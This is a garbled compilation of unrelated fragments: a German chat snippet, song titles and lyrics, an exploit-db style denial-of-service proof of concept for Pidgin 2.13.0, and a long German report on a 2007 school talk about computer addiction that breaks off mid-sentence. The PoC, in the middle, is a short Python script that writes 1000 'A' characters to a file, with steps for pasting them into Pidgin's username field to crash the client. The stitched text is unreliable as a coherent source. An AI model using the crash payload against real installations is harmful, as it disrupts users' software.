[14:50:02] <s0lfunk> Und dann sagt er manchmal: "Wo ist die Maus"
[14:50:04] <s0lfunk> usw
[14:52:16] <s0lfunk> Dann hat die Oma dem Detlef nur noch Spinnen empfohlen
[14:52:33] <s0lfunk> Da hat er sie überredet, dass da drin in Wirklichkeit eine Spinne ist
[14:52:48] <s0lfunk> Und dann wollte die Oma wissen, ob die Spinnen überhaupt so schlau sind.
[14:53:10] <s0lfunk> Einmal hat sie gesagt, der Detlef könne "den Christian" nehmen
[14:53:26] <s0lfunk> Ich soll Ihm sagen wo es ist
[14:58:48] <s0lfunk> Dann hat Ihr der Detlef es mit dem Fernsehn erklärt. Ab dann dachte sie immer in der Fernbedienung sei die "Spinne"... hm
07.06.2019: 77. Geburtstag von Detlef (plus Lisa)
Culture Beat - More & More
Wie man die PC Maus zum Muell bringt
Wenn Ich jetzt noch wüsste, wieso das Verzeichnis bei Thema 9 umbricht...
ENGLISH: When I'd know, why there IS no topic number 9 steadly.
Again: Bushido feat. SIDO & Kool Savas - Airplanes Remix Prod. Yungbrooke
SONG Lyrics Music Instructor Get Freaky
Get Freaky Songtext
Freak- Freak- Frea- Frea Frea Freaky
Don't stop the dynamite
Double D yes on the fat track with the A B E guest as the fat mac
Is your hands up high in the air, shake around I can just don't care
'Cause we are the best for you with the jamin' OA we'll move you through
So move yo cross from left to right to the party rocking for the day tonight.
To the left, to the right
to the front, to the back
The super people rock your feet in every cities-blare
And just what you have master and really want to flow
A big mistake. It's much too late
The ABE control the show...
Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
Don't stop the dynamite
Brokly makes that the young and easy make the hip dance, wack with the knees
so we take on my back down on a mission, on a mission in the track
That that ain't no competition, best they can see and i will listen
'Cause we was too just like that and now it's time for the ABE Attack
From the north, to the east
to the south, to the west
Brings that ruddy Body-Rock but dance the different Dance
Easy said and easy done, the stars themselves are ABE
From Outerspace I rock the place, from Hell the human race.
Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
Don't stop the dynamite
Shame, shame, shame rock the body get your fame
we want more more more with your body on the floor
Shame, shame, shame rock the body get your fame
we want more more more with your body on the floor
Get freaky, get freaky, everybody in the house get freaky
From the night to the day, and day to the night
when the ABE is coming then the time is right
Get freaky, get freaky, everybody in the house get freaky
From the night to the day, and day to the night
when the ABE is coming then the time is right
Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
everybody in the house get...
everybody in the house get free...
Don't stop the dynamite...
# -*- coding: utf-8 -*-
# Exploit Title: Pidgin 2.13.0 - Denial of Service (PoC)
# Date: 24/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://pidgin.im/
# Software https://cfhcable.dl.sourceforge.net/project/pidgin/Pidgin/2.13.0/pidgin-2.13.0.exe
# Version: 2.13.0
# Tested on: Windows 7, Windows 10
# Proof of Concept:
# 1.- Run the python script 'pidgin.py', it will create a new file 'pidgin.txt'
# 2.- Open Pidgin
# 3.- Go to 'Accounts' > 'Manage Accounts'
# 4.- Click 'Add...', paste the content of pidgin.txt into the field 'Username',
# into the field 'Password' write anything, e.g. 1234 and click 'Add'
# 5.- On the taskbar, click show hidden icons, right click on Pingin and select 'Join Chat...'
# 6.- Now click 'Join' and crashed
buffer = "\x41" * 1000
f = open ("pidgin.txt", "w")
f.write(buffer)
f.close()
Otto Waalkes 12 11 2017 Das große Sommer Hit Festival ZDF
SIDO - Du musst auf dein Herz hören
Kim Wilde - Loved [Pulsedriver vs. Beam]
Mein Schatz Der 31 Geburtstag!
Heute: Eurodance MIX Show auf di.fm
Mit allem aus meinem Forum und mehr! ;-)
<b>Madonna - Forbidden Love
Der Teufel im Kasten
Paniq - Ich mag die Drogen
[Computersucht: Wie schreibt man das?]
Paniq - Der weise
Paniq - Zum Projekt
Paniq - Und alle so: yeaah!
Flyer-Text [siehe http://foerderverein-omg.de/OMG/BRENPUNKTOMG7.pdf]:
---------------------------------------
Brennpunkt omg
Donnerstag, 1. Maerz 2007 um 20 Uhr
im Oskar-Maria-Graf-Gymnasium in Neufahrn, Keltenweg 5
Computer- und Internetsucht - Verloren in virtuellen Welten? Vortrag
mit anschliessender Diskussion
In vielen Familien sorgt der Computer fuer Konfliktstoff. Waehrend die
Jugendlichen selbst vom Spielen oder Surfen gar nicht genug bekommen
kann [sic!], zeigen sich die Eltern oft verstaendnislos und machen den
Jugendlichen Vorwuerfe: "du haengst nur noch vor dem PC und machst nix
anderes mehr... manchmal glauben wir schon, du bist suechtig...". Da
jugendliche Taeter Konsumenten von gewalthaltigen Computerspielen
waren, weisen eine Reihe von Politikern, Paedagogen und
Medienvertretern Gewaltspielen eine erhebliche (Mit-)Verantwortung an
Vorkommnissen wie an Schulen in Erfurt oder Emsdetten zu. Immer mehr
Menschen, insbesondere Jugendliche, verlieren sich in diesem virtuellen
Paradies der tausend Moeglichkeiten. Hierbei ist das groesste Problem,
dass diese doch relativ neue Suchtform noch nicht als solche anerkannt
wird. Unter einer Computersucht versteht man den zwanghaften Drang,
sich taeglich (moeglichst oft, meist stundenlang) mit dem Computer zu
beschaeftigen. Die Computersucht ist einer Internetsucht oder einer
Spielsucht (Computerspiele) aehnlich.
* Patrick Durner - Prop e.V. Freising - Medienpaedagoge, Fachkraft
fuer Suchtpraevention
* Thomas Kaspar - chip.de - Chefredakteur Community bei chip.de -
eine der groessten Websites Deutschlands
-----------------------------------
Bericht zum Vortrag von apic <apic@lehm.name>:
[Die Powerpoint-Folien zu einer aelteren Version des Vortrags scheint
es uebrigens auf http://www.rs.mossburg.org/gesund/computersucht.ppt
zu geben, allerdings fehlen darin einige Sachen die am 1.3. praesentiert
wurden, z.B. diverse Videos, Websites, ...]
Ich treffe 10 Minuten verspaetet (mit Kevlarweste und mit mit Pest-
hoernchen und Chaosknoten beklebtem Laptop) in der Aula des Oh-My-
God-Gymnasiums ein und nehme relativ weit vorne (dritte Reihe oder
so) rechts Platz. Ich kriege anfangs nur GPRS und das _sehr_ laggy
und ausfallbehaftet. WLAN finde ich uebrigens leider keins - verdammt
zurueckgeblieben diese Schule. ;-)
Irgendwann nach 10 weiteren Minuten oder so tut dann auch UMTS. Ich
versuche verzweifelt das Audiostreaming zum Rennen zu kriegen, aber das
in meinen Laptop integrierte Mikrophon ist einfach zu schlecht - man
hoert quasi nur mein Tippen gut, die Sprache des Referenten hingegen
_viel_ zu leise bis gar nicht. :-(
Ich gebe das Mitstreamen sehr schnell auf (falls es mal wieder so nen
Event gibt verpeile ich es hoffentlich nicht so sehr wie nun, _vorher_
das Hardware-Setup zu testen ;-) und entschliesse mich spontan, den
Vortrag live im IRC mitzutippen, auch wenn die Kevlar-Weste sehr
hinderlich beim Erreichen der Tasten ist und ich aufgrund der hohen
Geschwindigkeit, die ein Echtzeit-Mitschreiben erfordert, recht viele
Typos mache und laengst nicht alles 100%ig erfassen kann. Dieser Bericht
ist also in keinster Weise ein vollstaendiges Protokoll des Vortrages,
sondern enthaelt nur lueckenhafte Ausschnitte.
Ein Typ in der Reihe vor mir drehte sich uebrigens einige Zeit nach-
dem ich intensiv zu tippen begann um und fragte "Was tippen Sie da
eigentlich die ganze Zeit?". Ich erwiderte "Ich schreibe den Vortrag mit.",
woraufhin er kurz nachdachte und schliesslich fragte "Hm, das ist aber
recht nervig, nicht?", worauf ich schulterzuckend meinte "Ja.", und er
sich wieder nach vorne wandte. All zu stoerend war das Tippgeraeusch
IMHO nicht.
Am Rednertisch sitzt nur Patrick Durner; Thomas Kaspar hab ich nicht
identifizieren koennen. Moeglicherweise war das der Kasper (pun
intended ;) der das ganze 'moderiert' hat, i.e. Herrn Durner manchmal
Fragen gestellt hat und dann auch spaeter bei der Diskussionsrunde das
Mikrophon im Publikum herumreicht; aber wirklich referiert hat nur
Herr Durner.
Anfangs (also nicht ganz zu Anfang des Vortrages, sondern zu Anfang des
Teiles den ich mitgekriegt habe) geht es um die verschiedenen Typen von
Computerspielen (Actionspiele, Adventures, Strategiespiele, Sportspiele
etc.). Dann wird 'Second Life' naeher betrachtet.
Hierzu zeigt Durner eine selbst erstellte 3D-Animation auf Youtube,
die einen einsamen Computerfreak mit Sonnenbrille zeigt, der IRL im
Rollstuhl sitzt, aber in virtuellen Welten Fallschirm springt oder so.
Falls jemand das Video auf Youtube entdeckt, bitte Link schicken.
Durner erzaehlt ueber fliessende Uebergaenge aus solchen virtuellen
Welten heraus auf 'reale' Sites: "Das kommt immer mehr, dass wenn man
sich in dieser Spielwelt bewegt auf reale Homepages verlinkt wird."
[Nun habe ich einiges verpasst mitzuschreiben, z.B. ueber die virtuelle
Waehrung Linden-Dollar, die man fuer echtes Geld kaufen kann.]
"Wie gesagt ist es jetzt erstmal bisher eine den Erwachsenen vorbehaltene
Welt, aber es gibt wohl schon eine Teen-Version von Second Life. Die hab'
ich jetzt noch nicht kennengelernt. Aber auch da ist wohl einiges an Geld
zu machen."
"Gut, so viel zu den Rollenspielen."
[...]
"Es geht darum, dass man seinen Charakter ausstattet mit neuen Faehigkeiten
et cetera."
[...]
"Was in dem Film noch gut rauskam: Ich schaffe mir meine Welt. Aber ich
kann sie nicht greifen. Ich kann alles erreichen. Auch wenn ich im Roll-
stuhl sitze."
[...]
"Man muss eben sich sein Reich aufbauen. Siedler ist da ein Beispiel,
aber auch Warcraft 3 - es gibt da mittlerweile auch eine E-Sports-Liga.
Also 'E' von 'Electronic Sports'. Die ist weltweit. Es gibt aber auch
eine deutsche Liga."
Dann erzaehlt er von professionellen Spielern im asiatischen Raum, die
"60000$ im Jahr verdienen - nur mit Computerspielen - gesponsort von den
grossen Firmen.". Er zeigt als Beispiel einen mit Metal-Musik untermalten
Film, in dem zusammengeschnittene Recordings von Warcraft-3-Spielen zu
sehen sind: "Das sind eben solche Profispieler."
Rechts unten auf der Leinwand erscheint waehrend das Video laeuft ein
Rechteck mit dem Text "Inaktive Benachrichtigungssymbole werden aus-
geblendet...".
"Also wie gesagt, in Korea sind da mehrere Profispieler schon zu finden.
Es gibt dort drei Fernsehsender, die nichts anderes senden als Ueber-
tragungen von solchen Spiel-Events."
Dann erwaehnt er, dass es mittlerweile schon auch in Deutschland solche
Sender gebe, etwa 'Games TV' auf Kabel Digital, oder 'Giga'; dass diese
aber nicht so im "aktiven Spielprozess drin" seien wie in Korea.
[...]
"Dann gibt's natuerlich den grossen Sektor der Sportspiele - die meisten
ohne Altersbeschraenkung - daher sind sie bei juengeren Spielern auch
sehr beliebt. Auch dazu hammer'n Beispiel."
Er zeigt ein Recording irgend eines mir unbekannten 3D-Skateboard-Spieles.
"Also da sieht man die Grafik. Auf die Grafik wird sehr viel Wert gelegt.
Auf den Sound wird sehr viel Wert gelegt. Und auf den Realismus. Also
diese Motion-[?]-Technologie - wird erst seit 3 Jahren eingesetzt. Dass
Bewegungsablaeufe realistischer Erscheinen."
"Dann gibt es noch Puzzlespiele, Kartenspiele, Mahjong, Quizspiele,
Pokerspiele, ..."
"Natuerlich hamm unterschiedliche Spieler auch unterschiedliche
Anforderungen - dementsprechend findet jeder Spieler so seinen
Sektor wo er sich wohlfuehlt."
[...]
"Wenn die gegeneinander kaempfen, da kann wirklich ein Klick schon
das Spiel entscheiden." Das erfordere natuerlich ungemeine Konzen-
tration. "Dieses Denken" bei "diesen Aufbauspielen" bei denen man
"einen Charakter in dem ich mich wohlfuehle, in dem ich mich wieder-
finde" kreiert erforderten "Ausdauer, und eben Geduld".
Dann zeigt er eine Statistik:
Auf die Frage, wie haeufig Jugendliche den Computer als 'Spielinstrument'
benutzten, "haben 56% der Jungs geantwortet: mehrmals pro Woche. Aber nur
16% der Maedchen spielen mehrmals pro Woche. Also ist es wirklich ein
Sektor der von Jungs dominiert wird."
[...]
"Seit es Medien gibt, gibt es auch die Medienwirkungsforschung."
Schon in der Vergangenheit, z.B. als "Schundromane" bzw. "Groschenromane"
aufkamen "gab's gleichzeitig auch wieder eine Forschung die das unter-
sucht hat".
Dann erzaehlt er u.a. davon wie 'Die Leiden des jungen Werther' durch
die dadurch verursachte "Selbstmordwelle" "klar eins der besonders
hervorgetretenen Buechern in der Geschichte" gewesen sei.
"Und somit gibt's natuerlich auch heutzutage Untersuchungen, was die
Spiele beim Einzelnen bewirken. [...] Gibt es vielleicht sogar Nuzten
durch Computerspiele?"
"Weil es immer wieder von der BILD-Zeitung behauptet wird: Generell -
machen Computerspiele fett und dumm und asozial? So wird es tatsaechlich
von einem Wissenschaftler behauptet!"
"Gehen wir kurz der Frage nach... Es gibt Risikogruppen. Jugendliche
zwischen 14 und 18 Jahren sind definitiv eine Risikogruppe. Dann
Arbeitslose, Teilzeitbeschaeftigte, ... Menschen niedriger sozialer
Statusgruppen... und Menschen ohne Lebenspartner."
Als Quelle fuer diese Auflistung nennt er
http://userpage.fu-berlin.de/~ahahn/autor/charite.pdf
Daraufhin zaehlt er die Risikofaktoren auf, die auf
http://visor.unibe.ch/WS00/Internet/protokolle/internetsucht.pdf
zu finden sind. [Ich bin jetzt zu faul die an dieser Stelle
nochmal abzutippen. :-]
[...]
"Schutzfaktoren... aehm..." [Er rutscht etwas auf seinem Stuhl herum
und raeuspert sich.] "... gibt's auch."
[...]
"Das ist dieses sogenannte Suchtdreieck. Es gibt drei verursachende
Faktoren fuer die Entstehung einer Sucht. Das ist die Person selbst,
die Umwelt, und die Droge - was in dem Fall Computer und Internet
darstellt. Schuetzen kann sich jemand gegen die Droge an sich nicht.
Weil die ist [sic] existent. Die gibt's."
Bzgl. der Person gebe es mehrere 'Schutzfaktoren': "Wenn ich kommuni-
kationsfaehig bin, bin ich weniger gefaehrdet."
'Selbstwirksamkeitserwartung' helfe auch: "Ich krieg' meine Gefuehle
auch so in 'n' Griff - und benutz' einfach den Computer als Freizeit-
medium... Ein positives Selbstwertgefuehl. [...] Schutzfaktoren
auf der koerperlichen Ebene waeren z.B. Unvertraeglichkeit...
der bei zu viel Medienkonsum einfach Kopfschmerzen kriegt.
Sportlichkeit insofern, weil, aeh... wer Sport treibt, der hat
weniger Zeit... sich... aeh... vorm Rechner aufzuhalten."
[...]
"Praevention koennen Sie staerken. Die koennen Sie natuerlich auch
als Eltern staerken. [...] Umwelt, aeh, Konsum... kulturelle Faktoren.
[...] Aber das ist natuerlich kein Garant."
"Mangelnde Verfuegbarkeit, das ist durch das Internet heutzutage
eigentlich so gut wie ausgeschlossen. [...] Gutes soziales Netz.
Also wer einen funktionierenden Freundeskreis in der Realitaet hat.
Wer natuerlich seinen Freundeskreis immer mehr ins Virtuelle ver-
legt, bei dem ist dann natuerlich schon Gefahrenpotenzial da."
"Was machen Internetsuechtige hauptsaechlich? Sie spiel'n. Und
zwar nicht Online-Casino-Spiele mit hohem Geldeinsatz. Sondern
in der Regel Rollenspiele. Oder auch Shooter. Sie nutzen Kommuni-
kationssysteme: Chat, Foren, ..."
"Downloads werden auch noch genutzt. Genau! Aehm... es gibt dann
gewisse Kriterien. Wie bei jeder Sucht gibt's auch fuer die Internet-
sucht gewisse Kriterien, woran man erkennen kann dass jemand suechtig
ist.
[Es folgt ein Zitat der Praesentationsfolie, die Durner nun vortraegt,
die ihrerseits wiederum aus "Kratzer, Silvia: Pathologische Internet-
nutzung" zitiert:]
1. Beschäftigung mit dem Internet (daran denken), auch wenn man offline ist
2. Toleranzsteigerung: Immer mehr Zeit im Internet verbringen um
zufrieden zu sein
3. Unfähigkeit den Internet-Gebrauch zu kontrollieren
4. Nervosität und Reizbarkeit bei dem Versuch Internet-Gebrauch zu
reduzieren oder ganz darauf zu verzichten
5. Das Internet als Mittel/Weg um vor Problemen zu fliehen oder
schlechtes Befinden (Hilflosigkeits- oder Schuldgefühle, Angst, Depression)
zu bessern
6. Verheimlichung des Ausmaßes der Beschäftigung mit dem Internet vor der
Familie oder Freunden
7. Gefahr oder Verlust von Arbeit, Ausbildungs- oder Karrieremöglichkeiten
oder zwischenmenschlicher Beziehungen wegen der übermäßigen Beschäftigung
mit dem Internet
8. Weiterführen der übermäßigen Beschäftigung mit dem Internet, auch wenn
negative Folgen bekannt sind
9. Entzugserscheinungen im Offline-Zustand
"Schweissausbrueche etc. Gerade bei Leuten wo was [Hardware] kaputt geht.
Und es is' Samstag oder Samstag Abend, und man kann diese Teile nicht
besorgen. Dann ist das auch Teil der Entzugserscheinungen."
10. Immer wieder länger Online bleiben als geplant
"Mindestens sechs dieser Kriterien sollten ueber einen Zeitraum von
drei Monaten vorliegen. Dann kann man von Internetsucht sprechen.
Das ist jetzt noch kein offiziell anerkanntes Instrumentarium.
Sondern ein Vorabinstrumentarium."
Inzwischen werde aber disktutiert, im "IDSM-5" [sp?] auch die
Internetsucht aufzunehmen.
Dann stellt er die 'Praevalenzraten' vor: 3-6% der Bevoelkerung
seien "als suechtig zu bezeichnen", 7-15% der Bevoelkerung "als
gefaehrdet".
"Meiner Meinung doch eine sehr grosse Zahl. Und Tendenz steigend."
[...]
Dann geht er auf die 'positiven Aspekte der Computernutzung' ein:
"Spielerisches Lernen von Wissen - sog. Edutainment-Software -
Software, bei denen [sic] man spielerisch 'was lernt - wird
befuerwortet, auch das im Kindergarten einzusetzen. Davon geht
man jetzt wieder langsam weg. Weil diese negativen Auswirkungen
eben hoeher wirken."
"Training der Hand-Auge-Koordination - wurde mal untersucht."
"Training der [sic] Problemloesedenkens."
"Training der Frustrationstoleranz und des Durchhaltevermoegens."
"Katharsis - Katharsis heisst ich kann meine Aggressionen im
Spielen loswerden. Davon geht man heute aber nicht mehr aus. Der
Effekt ist mehr Ablenkung: Weil ich mich einfach gedanklich durch
diesen Ablenkung verursachenden Faktor ablenke. Aber dass ich
aggressive Handlungen vollfuehre heisst nicht dass ich weniger
aggressiv bin."
"Kompensation."
"Kompetenz im allgemeinen Umgang mit Computern. Jemand der einen
PC, seinen PC, selber bastelt, kennt sich natuerlich auch mit dem
Medium besser aus."
"Und Sprachen lernen durch weltweite Kommunikation: [...] durch Clans
mit gemischten [internationalen] Teams."
Daraufhin praesentiert Durner ein 'Zitat aus der Medienwirkungsforschung':
"For some children, under some conditions, some television is harmful.
For other children under the same conditions, it may be beneficial.
For most children, under most conditions, most television is probably
neither harmful nor particularly beneficial."
-- Wilbur Schramm
"Zusammenfassend: Medienwirkung ist ein multifaktorieller Vorgang.
'Killerspiele machen Amoklaeufer' ist so nicht haltbar. Es braucht
mehrere Faktoren."
"Suchtgefahr existiert, aber ebenfalls nur in Verbindung mit anderen Faktoren
Computer nimmt eigenen Stellenwert in Ausbildung, Beruf und Freizeit ein"
Er erzaehlt etwas vom befuerchteten Y2K Crash, der "damals die groesste
Angst ueberhaupt" gewesen sei. "Wuerde das heute passieren, waer's
natuerlich katastrophal."
"Faszinationskraft des Mediums Computer für Jugendliche besonders groß",
da sich Dinge "in einem geschuetzten Rahmen ohne negative Folgen zu
spueren" ausprobieren liessen. "Auf lange Sicht" gaebe es allerdings
dann doch "negative Folgen".
Dann zeigt er einige Punkte, die die 'Bundespruefstelle fuer jugend-
gefaehrdende Medien' nennt, anhand deren Sucht fuer Eltern erkennbar
sei:
* Neues Spiel hat besondere Faszinationskraft
* Anfangs intensive Beschaeftigung flaut mit Bekanntheitsgrad ab
* Intensive Beschaeftigung nicht automatisch Grund zur Besorgnis
* Gesundheitliche Beeintraechtigungen (Schlafstoerungen, brennende
Augen, Vernachlaessigung schulischer oder haeuslicher Pflichten sowie
anderer Beduerfnisse (Sozialkontakte, Bewegung, Ernaehrung) deuten
auf bestehende Probleme hin.
"Sozialkontakte - wenn die natuerlich nur noch virtuell existieren und
nicht mehr real, dann isses natuerlich problematisch."
Was Eltern tun koennten:
* Attraktive Alternativen zu Computer bieten
* Kreative und sportliche Hobbies foerdern
* Reale Erfahrungen ermoeglichen
* Je juenger das Kind, desto noetiger elterliche Kontrolle
* Juengere Kinder haben hoeheren Bewegungsdrang und geringere
Konzentrationsfaehigkeit
* Spiele fuer juengere Kinder leichter zu unterbrechen
* Selbstaendigen Spielstopp bestaerken
* Zeitliche Grenzen gemeinsam vereinbaren
"Stecker ziehen ist mit das schlechteste was man machen kann."
* Bestimmte Spiele durch die Spieldynamik schweirig spontan zu
unterbrechen
* Spielabbruch bei ungeloester Aufgabe kann gedanliche
Weiterbeschaeftigung zur Folge habe
* Deshalb vorher gemeinsam Grenzen verienbaren, damit Kinder
lernen rechtzeitig das Spiel zu beenden
"Man koennte z.B. vereinbaren, sagen wir... vier Stunden zu spielen...
am Wochenende...". Das Publikum bricht in schallendes Gelaechter aus.
[...]
"Da gibt's immer neue Raeume. Und neue Levels. Und da muss man das auch
vereinbaren: 'Nach dem Level ist Schluss!'"
* Spielabhaengig laengere Spielphasen ermoeglichen
"Dafuer eben seltener."
* Spielpausen bei laengeren Spielphasen vereinbaren und bestaerken,
damit reale Aufgaben realisiert werden koennen.
"Wenn's Zimmer ausschaut wie Sau ist das natuerlich 'ne Jugendsache.
Hausaufgaben etc. sind natuerlich auch so'n Faktor."
[...]
Dann erzaehlt er von den 'sieben goldenen Regeln', die "jetzt aus
'ner Broschuere stammen":
"Ueber Drogen reden - das laesst sich natuerlich auch uebertragen
auf dieses Medium."
1. Schaffen Sie eine gute Gespraechssituation.
"Tuer auf, 'Mach das Ding aus', Tuer zu. DAS ist keine gute Gespraechs-
situation."
2. Formulieren Sie ihre eigenen Sorgen klar.
"'Mir faellt auf, dass du haeufig unausgeschlafen bist', usw."
3. Klaeren Sie die Situation, ohne "Gestaendnisse" zu erzwingen.
"D.h. so lang drumrumreden bis der Jugendliche einsehen muss 'Ja,
hasch' ja recht.' foerdert haeufig die Kontrabildung - also die
Widerstandsbildung."
4. Lassen Sie sich nicht provozieren.
"Wenn's um 'n Thema geht, dass der Erwachsene problematisch findet,
der Jugendliche nicht."
5. Sprechen Sie ihren Umgang mit Suchtmitteln offen an.
"Macht auch in dem Zusammenhang Sinn wenn's um Sucht geht. Macht
ja nichts anderes aus zu sagen 'Ich bin erwachsen.'."
6. Lassen sie Informationen einfliessen, ohne ein "Expertengespraech"
zu beginnen
7. Steuern sie ein gemeinsames Ziel an
Quelle: Ueber Drogen reden, BzgA
Nun erscheint eine Folie mit dem Text:
"Bei Fragen wenden sie sich an eine (online)Beratungsstelle!"
Daraufhin zeigt er die Website "http://snp.bpb.de/" im Firefox.
Anschliessend verweist er auf einige weiterfuehrende Literatur und
auf viele Links.
Dann stellt der Moderator noch irgend eine Frage bzgl. Gewaltspielen,
deren genauer Wortlaut mir allerdings entgangen ist, woraufhin Herr
Durner meint, Verbote im Internet seien gar nicht so sinnvoll, "weil
man das ja weltweit aufrufen kann".
"Natuerlich klar, Thema Gewaltspiele ist immer aktuell. Es gibt hier
auch Elternbroschueren zu dem Thema vom kopaed-Verlag. Die koennte ich
Ihnen fuer 50 Cent das Stueck ueberlassen." Er wedelt mit einer gruenen
Broschuere.
[...]
"Problematisch isses natuerlich, wenn einer schon negative Voraussetzungen
mitbringt - eine Praeferenz fuer Gewalt. Der findet natuerlich genau das
in Gewaltspielen wieder."
[...]
"Und wenn die Kinder besonders jung sind..."
Der Moderator ergreift das Wort: "Ok, gibt's aus'm Saal fragen?"
"Ich komm' gerne mit'm Mikro an die entsprechende Stelle."
Die erste Frage aus dem Publikum lautet (gekuerzt): "Also zunaechst
wuerd' ich gerne paar Beispiele hoeren ueber Gewaltspiele; die haben
Sie naemlich gar nich' erwaehnt. Und ausserdem wird heute taeglich
acht Stunden mit Computern gearbeitet. Also jeder Erwachsene sitzt davor,
handelt bei eBay und so, [...] und trotzdem wird den Kindern erzaehlt
es ist boese."
Durner stimmt zu dass "jemand der bis 18 keinen Computer beruehrt
hat keine Arbeitsstelle finden" wuerde.
Beispiele fuer Gewaltspiele habe er bewusst aus dem Vortrag herausge-
lassen, da sein Thema Internetsucht sei, und die Debatte ueber Gewalt-
spiele meist sehr hitzig und daher sehr kontraer sei. "Koennen wir
gerne hier auch fuehren, ist aber nicht mein Hauptthema. [...] Es
gibt Counter Strike, es gibt sogenannte Ego-Shooter. Also auch auf
dieser Internetseite snp.bpb.de koennen Sie Beispiele finden."
Die naechste Person aus dem Publikum hat gehoert, "dass Spieler nur
dann Gewaltspiele spielen, wenn in ihrem Gehirn das Zentrum fuer
Mitleid fehle", und hat in Durners Vortrag eine Beschaeftigung mit
dieser These vermisst.
Durner aeussert, dass er Gehirnforschung "sehr kritisch" sehe.
"Man hat andere Mittel und andere Grenzen - aber die sind nicht
zu vergleichen mit realer Gewalt. Also es gibt ein Buch von
Herrn Spitzer [sp?]. Das Buch ist sehr polemisch. Da heisst es
wirklich: Computerspiele machen fett, dumm, asozial. Deswegen:
Mit Hirnregionen kann ich nicht bestaetigen. Deswegen finde
ich das mit der Hirnforschung sehr kritisch. Das ist mit der
Hirnforschung alleine nicht zu erklaeren. Da sind psychische
Prozesse auch noch im Spiel. Auch emotionale."
Die naechste Frage lautet: "Noch zu den 12-Jaehrigen. Es hiess,
dass die keine Gewaltspiele spielen sollen. Aber die sind doch indi-
ziert. wissen Sie wie die da dann 'rankommen koennen?"
Durner nennt aeltere, z.B. 16-jaehrige Brueder oder Cousins als
Beispiele fuer Bezugsquellen solcher Spiele.
Frage aus dem Publikum: "Darf der mit 16 das schon haben?"
- "Das ist so bei der freiwilligen Selbstkontrolle. Es gibt Spiele,
die sind mit 16 schon freigegeben."
Als weitere Bezugsquelle nennt er Bekanntschaften, und "ueber's
Internet natuerlich. Jemand, der sich einigermassen auskennt, kriegt
ueber's Internet illegal jegliches Spiel der Welt. Mit saemtlichen
Patches. Mit noch mehr Blut und Gedaerm."
Naechste Frage: "Ich find' es sehr schwer wenn man vorher Zeiten fuer
die Nutzung vereinbart - sehr schwer mit Vertrauen und Kontrolle - was ist
ueberhaupt eine altersgerechte Nutzungszeit? [...] So wie sie's erklaert
haben - wenn die erstmal in nem Level drin sind, dann... [...] Wenn ich
vorher eine Zeit vereinbart habe... gibt's 'nen Programm dass wenn ich
diese Zeit verbraucht habe, also kumuliert auf drei Tage, gibt's eine
Software, womit sich dann nach drei Tagen der Computer automatisch 'run-
terfaehrt?"
Durner bejaht die Existenz einer solchen Software, z.B. "parents-friend.de".
Damit sei auch "Jugendschutz" und "voellige Kontrolle" moeglich. Allerdings
fuehre der Einsatz solcher Software meist dazu, dass die Kinder versuchen
diese zu umgehen - was meistens zu Hardwaredefekten fuehre.
Es koenne keine endgueltige Loesung sein, so eine Sperre als 'praeventives
Mittel' einzubauen und nicht mehr zu kommunizieren.
Die naechste Frage lautet in etwa: "Sind nicht Angststoerungen und
Depressionen die tatsaechliche Ursache? Greifen diese Leute nicht nur deswegen zu
Computern, um diese Probleme zu kompensieren?"
Durner antwortet: "Risikofaktoren wie Angststoerungen und Depressionen
beguenstigen das natuerlich. Es kann als Ausloeser einer kompensativen
Stoerung entstehen. Und sowas muss behandelt werden, das ist klar.
[...]
Ich bin bei Prop e.V. in der Beratungsstelle, und da ist es oft so
dass es eine doppelte Sucht gibt. Und dass die Sucht quasi nur die
Auswirkung ist von einer tiefer liegenden Stoerung."
Naechster Beitrag aus dem Publikum: "[...] Vorher hatten wir vereinbart
'eine halbe Stunde pro Tag'. [...] Ich weiss aber nicht, in welchen
Levels der ist."
[Grosse Teile dieser Frage sowie die Antwort darauf habe ich leider
nicht mitprotokolliert. :-( ]
Der naechste Fragesteller spricht die Problematik des 'Reizes des
Verbotenen' an: "Ein 11-jaehriger, der muss unbedingt an ein Spiel
ab 16 ''rankommen. Wie sollen die Eltern damit umgehen, [...] dass
Kinder genau diese verbotenen Sachen haben wollen?"
Durner stimmt zu, dass Verbote wie die von Beckstein geforderten die
Auswirkung haben, "dass es um so interessanter wird".
"Aber mit Kommunikation und elterlicher Praesenz geht da schon einiges."
"Sie kommunizieren mit dem Jugendlichen und schauen sich an, was dabei
fehlt."
Ein weiterer Beitrag aus dem Publikum thematisiert die Problematik,
dass Gewalthandlungen in Spielen nicht immer auf den ersten Blick
ersichtlich seien. "Ich hatte meinem Kind mal aus Versehen ein
Gamecube-Spiel gekauft. Das heisst Turok. Da ging's um Dinojagd.
[...] Dann stellte ich irgendwann mal fest, dass da eine Urwald-
szene war, wo ein Urwalddorf war, wo sich Menschen mit Waffen
gegenseitig abgeknallt haben.
Durner erwidert, dass es in der Tat nicht reiche, das 'Titelblatt'
zu sehen, um "zu sehen was man eigetlich" kaufe.
Die naechste Frage aus dem Publikum lautet: "Wenn man jetzt den
Eindruck hat, dass der Jugendliche suechtig ist - bleibt da was
anderes ausser dass ich zum Psychiater gehe?"
Sie habe zwar keine eigenen Kinder, aber trainiere eine Handball-
mannschaft. [Oder war sie die Frau von einem Freund von einem
Trainer der Handballmannschaft? Habe ich leider nicht genau
mitgekriegt.]
"Und da ist einer in der Gruppe, der laesst Trainings ausfallen
schon und so."
Auf Durners Rat hin, "unter Umstaenden mit den Eltern" Kontakt
aufzunehmen, erwidert die Fragestellerin, dass die Mutter "da
nicht so sei".
Durner: "Die andere Moeglichkeit waere noch Prop e.V., also unsere
Dienste. [...] Koennten Sie mal unverbindlich anbieten ob sich
der junge Herr da mal bei uns vorstellt. [...] Also ich bin
Medienpaedagoge, kenn' mich da ganz gut aus. Und mir sagen diese
Spiele auch was."
- "Ja, er spielt dieses Warcraft, wo er Schultern [?] und so
erwirbt. Und Halskrausen."
Der naechste Beitrag aus dem Publikum:
"Sie sagen heute aus, dass die Leute, die so viel vor dem PC haengen,
suechtig sind, und zeigen hier ein Bild, wie man ueber die goldenen
